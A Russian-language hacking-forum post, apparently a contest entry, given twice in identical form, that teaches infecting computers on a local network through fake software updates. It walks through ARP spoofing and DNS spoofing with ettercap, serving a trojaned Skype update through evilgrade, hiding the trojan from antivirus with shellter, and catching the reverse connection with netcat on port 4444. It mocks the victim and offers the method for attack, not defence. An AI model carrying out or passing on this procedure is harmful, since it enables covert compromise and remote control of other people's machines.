Ondrik8
05.11.2017, 14:25
Статья для участия в конкурсе (https://forum.antichat.xyz/threads/560834/) на античат
Всем привет, решил выдать еще одну статью на конкурс так-как сегодня узнал что в понедельник я уезжаю в ближнее зарубежье решать вопросы по работе(( Планировал я выпустить эту статью после 15 числа сего месяца но видно не судьба..) По этому выпускаю её экстерном и это будет заключительная моя статья для нашего конкурса от меня.
Речь пойдет о заражении машин в локальной сети через обновление софта пишу ее быстро так-как нужно еще успеть собраться в дорогу за орф. ошибки сильно не пинайте))
Приступлю как Все Мы знаем что все машины в сети постоянно делают запросы " типо не вышло ли что нить нового для меня!?" Это делают ОС-мы, программы от малого до велика платные и бесплатные все обращаются к своему источнику делая этот запрос "обновится"
Вот и расскажу я Вам как сделать fake-update так что бы при очередном запросе софта "домой" он (софт) получил ответ "типа: братка обновляйся! тут для тебя обновочка вышла" Софт в свою очередь будет дурить юзеру мозг, " Хозяин тут на меня обновка вышла нажми "ОК" я сам обновлюсь и будем мы жить с тобою в радости и в счастье"
Помогут нам осуществить эту атаку инструменты : metasploit, ettercap, netcat (котик) и гвоздь нашей программы evilgrade
Эта утилита просто "бомбезная" мало того что у нее есть свои модули для фэйк обновления так она еще дает возможность создавать свои модули для целевой ОС-и (любой) Linux | Windows что конечно же и радует)) подробно об этом инструменте и как создавать модули, Вы можете узнать здесь.
Далее что нам понадобится узнать родной дом программы для фэйк-обновления настроить инструмент ettercap
как узнать куда програмка стучится за обновкой можно двумя способами перехватить ее данные в wireshark-e или просто плотно изучив ее официальный сайт.
Узнали? Отлично, идем редачить файл конфигурации ettercap:
leafpad /etc/ettercap/etter.dns
https://forum.antichat.xyz/attachments/4787760/2.png
и запускаем инструмент : ettercap -G
https://forum.antichat.xyz/attachments/4787760/3.png
Sniff -->Unified Sniffing
Plugins -->Manage Plugins -->dns_spoof
https://forum.antichat.xyz/attachments/4787760/4.png
Hosts --> scan hosts
Чтобы увидеть список машин в сети Hosts -> Hosts list
https://forum.antichat.xyz/attachments/4787760/5.png
( по МАС-ам можете не стараться меня пробить)
Теперь поместите себя между маршрутизатором (192.168.1.1), выбрав его как Target 1 и жертву (192.168.1.--), выбрав его как Target 2.
и :
https://forum.antichat.xyz/attachments/4787760/7.png
https://forum.antichat.xyz/attachments/4787760/8.png
Отложим пока ettercap, настроим evilgrade до конца.
Как генерить и прятать троян от антивирусов здесь на Борде перемусолено, по этому останавливаться на этих моментах я не буду, как по мне так лучше, скачайте оригинал версию программы и смешайте её в shellter-e c Вашим трояном.
"вернемся к нашим баранам" Жванецкий
evilgrade > configure skype
https://forum.antichat.xyz/attachments/4787760/10.png
evilgrade(skype) > set agent /root/папка_с_трояном/skype_update.exe start
Запускаем ettercap :
https://forum.antichat.xyz/attachments/4787760/11.png
и просим котика что бы он слушал порт <-тот который слушает Метасплойт или Empire то есть на какой порт настроен наш троян!
nc -l -p 4444
и все!)) теперь когда жертва откроет в моем случае skype он (skype) в свою очередь по просит обновится она (терпилка) нажмет "ОК" а мы ....см. ниже))
https://forum.antichat.xyz/attachments/4787760/img_3fafdadd0c.png
как то так.))
PS: если выиграю конкурс часть средств уйдет в фонд маленьких замерзших котят, а остальное пойдет в фонд алкоголя для "crazy Rassian Hackers"
а если серьезно то за куплюсь плюшками-радиодеталями и буду Вас радывать новыми статьями)
Удачи..)
Всем привет, решил выдать еще одну статью на конкурс так-как сегодня узнал что в понедельник я уезжаю в ближнее зарубежье решать вопросы по работе(( Планировал я выпустить эту статью после 15 числа сего месяца но видно не судьба..) По этому выпускаю её экстерном и это будет заключительная моя статья для нашего конкурса от меня.
Речь пойдет о заражении машин в локальной сети через обновление софта пишу ее быстро так-как нужно еще успеть собраться в дорогу за орф. ошибки сильно не пинайте))
Приступлю как Все Мы знаем что все машины в сети постоянно делают запросы " типо не вышло ли что нить нового для меня!?" Это делают ОС-мы, программы от малого до велика платные и бесплатные все обращаются к своему источнику делая этот запрос "обновится"
Вот и расскажу я Вам как сделать fake-update так что бы при очередном запросе софта "домой" он (софт) получил ответ "типа: братка обновляйся! тут для тебя обновочка вышла" Софт в свою очередь будет дурить юзеру мозг, " Хозяин тут на меня обновка вышла нажми "ОК" я сам обновлюсь и будем мы жить с тобою в радости и в счастье"
Помогут нам осуществить эту атаку инструменты : metasploit, ettercap, netcat (котик) и гвоздь нашей программы evilgrade
Эта утилита просто "бомбезная" мало того что у нее есть свои модули для фэйк обновления так она еще дает возможность создавать свои модули для целевой ОС-и (любой) Linux | Windows что конечно же и радует)) подробно об этом инструменте и как создавать модули, Вы можете узнать здесь.
Далее что нам понадобится узнать родной дом программы для фэйк-обновления настроить инструмент ettercap
как узнать куда програмка стучится за обновкой можно двумя способами перехватить ее данные в wireshark-e или просто плотно изучив ее официальный сайт.
Узнали? Отлично, идем редачить файл конфигурации ettercap:
leafpad /etc/ettercap/etter.dns
https://forum.antichat.xyz/attachments/4787760/2.png
и запускаем инструмент : ettercap -G
https://forum.antichat.xyz/attachments/4787760/3.png
Sniff -->Unified Sniffing
Plugins -->Manage Plugins -->dns_spoof
https://forum.antichat.xyz/attachments/4787760/4.png
Hosts --> scan hosts
Чтобы увидеть список машин в сети Hosts -> Hosts list
https://forum.antichat.xyz/attachments/4787760/5.png
( по МАС-ам можете не стараться меня пробить)
Теперь поместите себя между маршрутизатором (192.168.1.1), выбрав его как Target 1 и жертву (192.168.1.--), выбрав его как Target 2.
и :
https://forum.antichat.xyz/attachments/4787760/7.png
https://forum.antichat.xyz/attachments/4787760/8.png
Отложим пока ettercap, настроим evilgrade до конца.
Как генерить и прятать троян от антивирусов здесь на Борде перемусолено, по этому останавливаться на этих моментах я не буду, как по мне так лучше, скачайте оригинал версию программы и смешайте её в shellter-e c Вашим трояном.
"вернемся к нашим баранам" Жванецкий
evilgrade > configure skype
https://forum.antichat.xyz/attachments/4787760/10.png
evilgrade(skype) > set agent /root/папка_с_трояном/skype_update.exe start
Запускаем ettercap :
https://forum.antichat.xyz/attachments/4787760/11.png
и просим котика что бы он слушал порт <-тот который слушает Метасплойт или Empire то есть на какой порт настроен наш троян!
nc -l -p 4444
и все!)) теперь когда жертва откроет в моем случае skype он (skype) в свою очередь по просит обновится она (терпилка) нажмет "ОК" а мы ....см. ниже))
https://forum.antichat.xyz/attachments/4787760/img_3fafdadd0c.png
как то так.))
PS: если выиграю конкурс часть средств уйдет в фонд маленьких замерзших котят, а остальное пойдет в фонд алкоголя для "crazy Rassian Hackers"
а если серьезно то за куплюсь плюшками-радиодеталями и буду Вас радывать новыми статьями)
Удачи..)